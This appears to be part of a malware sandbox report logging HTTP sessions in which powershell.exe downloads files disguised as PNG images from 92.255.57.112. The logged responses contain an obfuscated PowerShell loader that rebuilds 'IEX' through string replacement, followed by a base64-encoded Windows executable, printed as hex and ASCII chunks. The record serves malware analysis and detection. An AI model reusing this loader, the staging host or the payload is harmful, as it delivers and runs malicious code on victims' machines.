Jan 15, 2025 10:09:10.015805006 CET	224	IN	Data Raw: 4b 4b 47 77 43 41 41 59 6f 5a 51 45 41 42 67 73 48 49 4c 4b 41 55 38 63 6f 41 67 41 41 4b 78 63 6f 51 41 49 41 42 68 4d 45 45 51 51 57 4b 44 73 43 41 41 59 6f 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49 Data Ascii: KKGwCAAYoZQEABgsHILKAU8coAgAAKxcoQAIABhMEEQQWKDsCAAYo2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCF
Jan 15, 2025 10:09:10.015830994 CET	1236	IN	Data Raw: 79 4a 53 59 52 42 69 42 52 6f 41 77 53 57 6d 45 72 68 78 54 2b 42 67 4d 41 41 41 5a 7a 64 67 41 41 43 69 6a 2b 41 41 41 47 44 51 6b 58 4b 4d 30 43 41 41 59 4a 66 67 77 42 41 41 51 6f 63 67 45 41 42 69 41 4a 7a 4b 43 42 4f 46 6e 2f 2f 2f 39 2b 2b Data Ascii: yJSYRBiBRoAwSWmErhxT+BgMAAAZzdgAACij+AAAGDQkXKM0CAAYJfgwBAAQocgEABiAJzKCBOFn///9++gAABCh8AgAGEQYgaBPdu1og7iedgWE4PP///yoTMAUARQEAAAMAABECKL8AAAYKIHyKaEEgd1OOQ2ElCx8KXkUKAAAA/AAAALAAAACcAAAAeQAAAOAAAAAFAAAAOQAAAMP////MAAAAIQAAADj3AAAABi0IIAzu7o
Jan 15, 2025 10:09:10.015842915 CET	1236	IN	Data Raw: 41 41 50 34 41 41 41 41 75 41 41 41 41 78 51 41 41 41 41 55 41 41 41 42 49 41 41 41 41 71 51 41 41 41 44 67 50 41 51 41 41 45 51 51 65 4d 67 67 67 36 33 30 59 77 69 55 72 42 69 44 6f 78 2f 75 78 4a 53 59 72 70 42 59 54 42 42 45 4a 49 4e 64 37 5a Data Ascii: AAP4AAAAuAAAAxQAAAAUAAABIAAAAqQAAADgPAQAAEQQeMggg630YwiUrBiDox/uxJSYrpBYTBBEJINd7ZdFaIHIBx1phK5EbKLwBAAYMEQkgdwR4Dlog9klhNmE4d////xEGFyhEAQAGEwcRCSC+eW6WWiB1I4MIYTha////BiheAgAGEwUJEQXSbh4RBFofP19iYA0RBBdYEwQguY9K5zgz////BggWGyj9AQAGJhEJINxK0L
Jan 15, 2025 10:09:10.015856028 CET	448	IN	Data Raw: 59 45 77 59 52 43 78 35 6b 30 70 77 52 43 42 45 47 4a 52 64 59 45 77 59 52 43 78 38 51 5a 4e 4b 63 45 51 77 67 2b 4b 61 4a 71 56 6f 67 6e 5a 64 61 48 57 45 34 6f 2f 33 2f 2f 78 59 54 42 52 59 54 42 68 45 4d 49 49 63 73 71 65 52 61 49 45 6b 4a 4d Data Ascii: YEwYRCx5k0pwRCBEGJRdYEwYRCx8QZNKcEQwg+KaJqVognZdaHWE4o/3//xYTBRYTBhEMIIcsqeRaIEkJMElhOIr9//8RBxoRBxqVCBqVYZ4RBxsRBxuVCBuVYZ4RBxwRBxyVCByVYZ4RBx0RBx2VCB2VYZ4RBx4RBx6VCB6VYZ4RBx8JEQcfCZUIHwmVYZ4RBx8KEQcfCpUIHwqVYZ4RDCA/KYYxWiDPef4VYTgd/f//EQcfCx
Jan 15, 2025 10:09:10.015868902 CET	1236	IN	Data Raw: 65 45 51 77 67 55 36 54 71 39 56 6f 67 79 53 76 53 6b 32 45 34 61 2f 7a 2f 2f 78 45 4b 46 31 67 54 43 68 45 4d 49 4d 67 64 41 4c 78 61 49 4d 64 55 43 50 5a 68 4f 46 4c 38 2f 2f 38 52 42 78 38 4e 45 51 63 66 44 5a 55 49 48 77 32 56 59 5a 34 52 42 Data Ascii: eEQwgU6Tq9VogySvSk2E4a/z//xEKF1gTChEMIMgdALxaIMdUCPZhOFL8//8RBx8NEQcfDZUIHw2VYZ4RBx8OEQcfDpUIHw6VYZ4RBx8PEQcfD5UIHw+VYZ4WEwoRDCDDqDfUWiBWpnwtYTgP/P//CQkfGWJhDREMIN6HzGpaIEkke8thOPX7//8RCR8QMgggaKYCayUrBiD2WtIRJSY42/v//xEFagZuMgggk4uIECUrBiBfVB
Jan 15, 2025 10:09:10.015883923 CET	1236	IN	Data Raw: 52 42 79 41 58 43 2f 6b 61 57 69 43 77 65 76 4a 73 59 54 69 4b 2f 66 2f 2f 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 58 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 Data Ascii: RByAXC/kaWiCwevJsYTiK/f//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgDBEHIAEM7apaIFPLZqJhODf9//8GbhZqMwggxy5n7CUrBiCXiEeOJSY4Hf3//xEHINFqpcRaIFomiY5hOAr9//8HKhMwCQDeAgAABgAAEQIgrSuifFogSN6vImEQAAIfHmQKIB
Jan 15, 2025 10:09:10.015901089 CET	1236	IN	Data Raw: 4b 6d 43 42 4b 34 39 44 6b 59 53 55 54 42 78 38 4c 58 6b 55 4c 41 41 41 41 74 41 45 41 41 42 67 43 41 41 43 48 41 41 41 41 57 67 41 41 41 4c 37 2f 2f 2f 39 30 41 41 41 41 34 77 45 41 41 49 63 42 41 41 41 46 41 41 41 41 51 41 41 41 41 44 51 42 41 Data Ascii: KmCBK49DkYSUTBx8LXkULAAAAtAEAABgCAACHAAAAWgAAAL7///90AAAA4wEAAIcBAAAFAAAAQAAAADQBAAA4EwIAAAIfHmQKEgH+FQEAABsCIP///z9fEAACGGIQAAZuGGozCCDMz9+5JSsGIOj6YrolJhEHIBYGPn9aYSuDBm4Wai4IIPBWA5ElKwYgHcgexSUmOGn///8GbhlqMwggk5+8zSUrBiAmFjSxJSY4T////xEHIE
Jan 15, 2025 10:09:10.015925884 CET	1236	IN	Data Raw: 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 42 69 59 48 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 66 47 47 4a 67 45 77 55 52 42 79 43 32 55 69 66 68 57 69 43 59 65 41 42 71 59 54 69 62 2f Data Ascii: XWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwURByC2UifhWiCYeABqYTib/v//F40BAAAbDREHIErXwQ9aIFwsNhFhOIH+//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmAMEQcg0Xgi1loghW4Qu2E4Lv7//34BAAAEAiUXWB
Jan 15, 2025 10:09:10.015942097 CET	328	IN	Data Raw: 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 68 69 59 42 4d 45 45 51 63 67 63 2b 34 41 43 6c 6f 67 75 31 2b 57 55 47 45 34 48 2f 37 2f 2f 77 5a 75 47 47 6f 7a 43 43 43 65 7a Data Ascii: AAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMEEQcgc+4AClogu1+WUGE4H/7//wZuGGozCCCezg3gJSsGIFVtuPslJjgF/v//F40BAAAbDREHINozaShaIHy3fLlhOOv9//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBdABAAAbKHoBAAYocA
Jan 15, 2025 10:09:10.020905972 CET	1236	IN	Data Raw: 48 49 41 4a 61 68 55 68 61 49 45 32 34 36 57 31 68 4f 45 7a 39 2f 2f 38 43 48 78 35 6b 43 68 45 48 49 44 49 33 78 2b 68 61 49 47 49 37 6b 48 35 68 4f 44 54 39 2f 2f 38 52 42 79 44 46 7a 49 5a 42 57 69 44 48 53 4c 6f 5a 59 54 67 68 2f 66 2f 2f 42 Data Ascii: HIAJahUhaIE246W1hOEz9//8CHx5kChEHIDI3x+haIGI7kH5hODT9//8RByDFzIZBWiDHSLoZYTgh/f//ByoAAAATMAgA9QQAAAUAABEgcAAAAAogxUI+8iBPmDDbYSUTDB8jXkUjAAAAAwMAALEAAABUAgAA3QMAAF7///+XAgAAywIAACUAAAB7AgAAzAMAAG4CAAD0AAAAzAEAADgDAAANAQAA8AMAADYEAACCAwAAOgIAAB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	92.255.57.112	80	1644	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:09:09.331552982 CET	70	OUT	GET /1/3.png HTTP/1.1 Host: 92.255.57.112 Connection: Keep-Alive
Jan 15, 2025 10:09:10.018574953 CET	1236	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Tue, 14 Jan 2025 22:31:44 GMT Accept-Ranges: bytes ETag: "162f316d466db1:0" Server: Microsoft-IIS/10.0 Date: Wed, 15 Jan 2025 09:09:09 GMT Content-Length: 538502 Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACsK
Jan 15, 2025 10:09:10.018635988 CET	1236	IN	Data Raw: 4b 47 77 43 41 41 59 6f 5a 51 45 41 42 67 73 48 49 4c 4b 41 55 38 63 6f 41 67 41 41 4b 78 63 6f 51 41 49 41 42 68 4d 45 45 51 51 57 4b 44 73 43 41 41 59 6f 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49 42 Data Ascii: KGwCAAYoZQEABgsHILKAU8coAgAAKxcoQAIABhMEEQQWKDsCAAYo2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCFyJSYRBiBRoAwSWmErhxT
Jan 15, 2025 10:09:10.018649101 CET	1236	IN	Data Raw: 42 41 41 47 41 41 41 41 41 51 41 41 45 53 6a 5a 41 67 41 47 4b 67 41 41 45 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 69 72 41 51 41 47 4b 67 41 54 4d 41 51 41 42 77 41 41 41 41 45 41 41 42 45 43 4b 4c 55 41 41 41 59 71 41 42 4d 77 42 41 Data Ascii: BAAGAAAAAQAAESjZAgAGKgAAEzAEAAcAAAABAAARAiirAQAGKgATMAQABwAAAAEAABECKLUAAAYqABMwBAAHAAAAAQAAEQIoqwEABioAEzAEAAcAAAABAAARAig6AgAGKgATMAgAdgEAAAQAABECKMgBAAYKcy8AAAYLIG9vS4ogJEysgWElEwkfDF5FDAAAABQBAAAbAAAAuv///4wAAABlAAAA3wAAAP4AAAAuAAAAxQAAAAU
Jan 15, 2025 10:09:10.018661976 CET	672	IN	Data Raw: 63 76 37 2f 2f 78 45 45 46 31 67 54 42 42 45 4d 49 4d 6e 59 63 6c 56 61 49 48 52 6b 74 74 46 68 4f 46 6e 2b 2f 2f 38 52 44 43 44 41 6b 32 2f 65 57 69 41 46 57 55 53 32 59 54 68 47 2f 76 2f 2f 45 51 67 6f 49 51 45 41 42 6f 41 42 41 41 41 45 45 51 Data Ascii: cv7//xEEF1gTBBEMIMnYclVaIHRkttFhOFn+//8RDCDAk2/eWiAFWUS2YThG/v//EQgoIQEABoABAAAEEQwgOyOvkVogNl4kIWE4J/7//xEFHxBYEwURDCAN0E+OWiDs0WVtYTgN/v//EQofEC8IILcaN0MlKwYgdqmKOiUmOPP9//8RBxEKlRMLIE1un2I44v3//xEIEQYlF1gTBhEL0pwRCBEGJRdYEwYRCx5k0pwRCBEGJRd
Jan 15, 2025 10:09:10.018681049 CET	1236	IN	Data Raw: 45 51 77 67 55 36 54 71 39 56 6f 67 79 53 76 53 6b 32 45 34 61 2f 7a 2f 2f 78 45 4b 46 31 67 54 43 68 45 4d 49 4d 67 64 41 4c 78 61 49 4d 64 55 43 50 5a 68 4f 46 4c 38 2f 2f 38 52 42 78 38 4e 45 51 63 66 44 5a 55 49 48 77 32 56 59 5a 34 52 42 78 Data Ascii: EQwgU6Tq9VogySvSk2E4a/z//xEKF1gTChEMIMgdALxaIMdUCPZhOFL8//8RBx8NEQcfDZUIHw2VYZ4RBx8OEQcfDpUIHw6VYZ4RBx8PEQcfD5UIHw+VYZ4WEwoRDCDDqDfUWiBWpnwtYTgP/P//CQkfGWJhDREMIN6HzGpaIEkke8thOPX7//8RCR8QMgggaKYCayUrBiD2WtIRJSY42/v//xEFagZuMgggk4uIECUrBiBfVBA
Jan 15, 2025 10:09:10.018695116 CET	1236	IN	Data Raw: 42 79 41 58 43 2f 6b 61 57 69 43 77 65 76 4a 73 59 54 69 4b 2f 66 2f 2f 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 58 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 Data Ascii: ByAXC/kaWiCwevJsYTiK/f//fgEAAAQCJRdYEADgkX4BAAAEAiUXWBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgDBEHIAEM7apaIFPLZqJhODf9//8GbhZqMwggxy5n7CUrBiCXiEeOJSY4Hf3//xEHINFqpcRaIFomiY5hOAr9//8HKhMwCQDeAgAABgAAEQIgrSuifFogSN6vImEQAAIfHmQKIBi
Jan 15, 2025 10:09:10.018749952 CET	1236	IN	Data Raw: 6d 43 42 4b 34 39 44 6b 59 53 55 54 42 78 38 4c 58 6b 55 4c 41 41 41 41 74 41 45 41 41 42 67 43 41 41 43 48 41 41 41 41 57 67 41 41 41 4c 37 2f 2f 2f 39 30 41 41 41 41 34 77 45 41 41 49 63 42 41 41 41 46 41 41 41 41 51 41 41 41 41 44 51 42 41 41 Data Ascii: mCBK49DkYSUTBx8LXkULAAAAtAEAABgCAACHAAAAWgAAAL7///90AAAA4wEAAIcBAAAFAAAAQAAAADQBAAA4EwIAAAIfHmQKEgH+FQEAABsCIP///z9fEAACGGIQAAZuGGozCCDMz9+5JSsGIOj6YrolJhEHIBYGPn9aYSuDBm4Wai4IIPBWA5ElKwYgHcgexSUmOGn///8GbhlqMwggk5+8zSUrBiAmFjSxJSY4T////xEHIEx
Jan 15, 2025 10:09:10.018764973 CET	1236	IN	Data Raw: 57 42 41 41 34 4a 45 65 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 42 69 59 48 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 45 66 47 47 4a 67 45 77 55 52 42 79 43 32 55 69 66 68 57 69 43 59 65 41 42 71 59 54 69 62 2f 76 Data Ascii: WBAA4JEeYmB+AQAABAIlF1gQAOCRHxBiYH4BAAAEAiUXWBAA4JEfGGJgEwURByC2UifhWiCYeABqYTib/v//F40BAAAbDREHIErXwQ9aIFwsNhFhOIH+//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmAMEQcg0Xgi1loghW4Qu2E4Lv7//34BAAAEAiUXWBA
Jan 15, 2025 10:09:10.018779039 CET	1236	IN	Data Raw: 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 78 68 69 59 42 4d 45 45 51 63 67 63 2b 34 41 43 6c 6f 67 75 31 2b 57 55 47 45 34 48 2f 37 2f 2f 77 5a 75 47 47 6f 7a 43 43 43 65 7a 67 Data Ascii: AAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMEEQcgc+4AClogu1+WUGE4H/7//wZuGGozCCCezg3gJSsGIFVtuPslJjgF/v//F40BAAAbDREHINozaShaIHy3fLlhOOv9//9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBdABAAAbKHoBAAYocAI
Jan 15, 2025 10:09:10.018791914 CET	1236	IN	Data Raw: 48 77 36 56 59 5a 34 52 44 43 41 34 42 47 71 69 57 69 41 57 65 73 41 62 59 54 69 58 2f 66 2f 2f 45 51 63 66 44 78 45 48 48 77 2b 56 43 42 38 50 6c 57 47 65 45 51 77 67 57 47 64 70 65 6c 6f 67 72 58 6c 70 58 57 45 34 64 66 33 2f 2f 78 45 49 45 51 Data Ascii: Hw6VYZ4RDCA4BGqiWiAWesAbYTiX/f//EQcfDxEHHw+VCB8PlWGeEQwgWGdpelogrXlpXWE4df3//xEIEQYlF1gTBhELHmTSnBEIEQYlF1gTBhELHxBk0pwRDCCD1/2MWiCIlLS/YThD/f//EQUfEFgTBREMIKnntS5aIDp/HZhhOCn9//8RCR8QLwggdrm7gCUrBiBswxqFJSY4D/3//xEKHxAvCCBsydCsJSsGIE1aQoAlJjj
Jan 15, 2025 10:09:10.023636103 CET	1236	IN	Data Raw: 41 41 41 43 65 77 55 41 41 41 52 5a 47 32 52 59 66 51 55 41 41 41 51 44 65 77 6b 41 41 41 51 67 41 41 41 41 41 54 63 53 47 6b 55 42 41 41 41 41 39 76 2f 2f 2f 79 42 37 6a 55 49 54 4a 53 73 47 49 4e 35 30 44 7a 55 6c 4a 67 63 67 70 5a 6a 30 53 6c Data Ascii: AAACewUAAARZG2RYfQUAAAQDewkAAAQgAAAAATcSGkUBAAAA9v///yB7jUITJSsGIN50DzUlJgcgpZj0SlphOG7///8WKiDTRP/mOGL///8DJXsIAAAEBll9CAAABAIlewUAAAQCewUAAAQbZFl9BQAABAcgvlV0y1ogAuU9IGE4Lf///wMDewgAAAQeYgN7CgAABCheAgAGJSbSYH0IAAAEByBkeiAYWiDJuM0ZYTj+/v//AwN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	92.255.57.112	80	3276	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:09:09.351928949 CET	70	OUT	GET /1/1.png HTTP/1.1 Host: 92.255.57.112 Connection: Keep-Alive
Jan 15, 2025 10:09:10.062393904 CET	1236	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Tue, 14 Jan 2025 20:24:05 GMT Accept-Ranges: bytes ETag: "c7d94542c266db1:0" Server: Microsoft-IIS/10.0 Date: Wed, 15 Jan 2025 09:09:09 GMT Content-Length: 122758 Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACs
Jan 15, 2025 10:09:10.062422037 CET	1236	IN	Data Raw: 4b 4b 47 77 43 41 41 59 6f 5a 51 45 41 42 67 73 48 49 4c 4b 41 55 38 63 6f 41 67 41 41 4b 78 63 6f 51 41 49 41 42 68 4d 45 45 51 51 57 4b 44 73 43 41 41 59 6f 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49 Data Ascii: KKGwCAAYoZQEABgsHILKAU8coAgAAKxcoQAIABhMEEQQWKDsCAAYo2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCFyJSYRBiBRoAwSWmErhx
Jan 15, 2025 10:09:10.062433958 CET	1236	IN	Data Raw: 77 42 41 41 47 41 41 41 41 41 51 41 41 45 53 6a 5a 41 67 41 47 4b 67 41 41 45 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 69 72 41 51 41 47 4b 67 41 54 4d 41 51 41 42 77 41 41 41 41 45 41 41 42 45 43 4b 4c 55 41 41 41 59 71 41 42 4d 77 42 Data Ascii: wBAAGAAAAAQAAESjZAgAGKgAAEzAEAAcAAAABAAARAiirAQAGKgATMAQABwAAAAEAABECKLUAAAYqABMwBAAHAAAAAQAAEQIoqwEABioAEzAEAAcAAAABAAARAig6AgAGKgATMAgAdgEAAAQAABECKMgBAAYKcy8AAAYLIG9vS4ogJEysgWElEwkfDF5FDAAAABQBAAAbAAAAuv///4wAAABlAAAA3wAAAP4AAAAuAAAAxQAAAA
Jan 15, 2025 10:09:10.062452078 CET	1236	IN	Data Raw: 34 63 76 37 2f 2f 78 45 45 46 31 67 54 42 42 45 4d 49 4d 6e 59 63 6c 56 61 49 48 52 6b 74 74 46 68 4f 46 6e 2b 2f 2f 38 52 44 43 44 41 6b 32 2f 65 57 69 41 46 57 55 53 32 59 54 68 47 2f 76 2f 2f 45 51 67 6f 49 51 45 41 42 6f 41 42 41 41 41 45 45 Data Ascii: 4cv7//xEEF1gTBBEMIMnYclVaIHRkttFhOFn+//8RDCDAk2/eWiAFWUS2YThG/v//EQgoIQEABoABAAAEEQwgOyOvkVogNl4kIWE4J/7//xEFHxBYEwURDCAN0E+OWiDs0WVtYTgN/v//EQofEC8IILcaN0MlKwYgdqmKOiUmOPP9//8RBxEKlRMLIE1un2I44v3//xEIEQYlF1gTBhEL0pwRCBEGJRdYEwYRCx5k0pwRCBEGJR
Jan 15, 2025 10:09:10.062463999 CET	896	IN	Data Raw: 6f 66 67 45 41 42 68 45 48 49 4c 48 6a 32 58 74 61 49 44 4e 6c 4f 6a 70 68 4b 34 41 47 62 68 64 71 4d 77 67 67 69 65 4a 55 71 79 55 72 42 69 43 78 35 79 76 54 4a 53 59 34 5a 76 2f 2f 2f 77 5a 75 47 57 6f 75 43 43 44 56 77 58 70 62 4a 53 73 47 49 Data Ascii: ofgEABhEHILHj2XtaIDNlOjphK4AGbhdqMwggieJUqyUrBiCx5yvTJSY4Zv///wZuGWouCCDVwXpbJSsGIATcqHwlJhEHICgXtyhaYThD////fgEAAAQCCRb+HAEAABsofgEABhEHIJ26mqRaIBwhyU5hOB3///8XjQEAABsNEQcg1OoYvVog+H9ioGE4A////wIYYhAAEQcgG5JUT1ogrMFZhGE46/7//xEGpQEAABsLEQcgaj
